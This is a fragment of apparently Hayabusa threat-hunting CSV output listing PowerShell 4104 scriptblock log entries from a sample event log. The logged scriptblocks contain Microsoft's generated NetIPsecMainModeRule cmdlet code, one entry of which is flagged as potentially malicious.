[string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo 
= [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
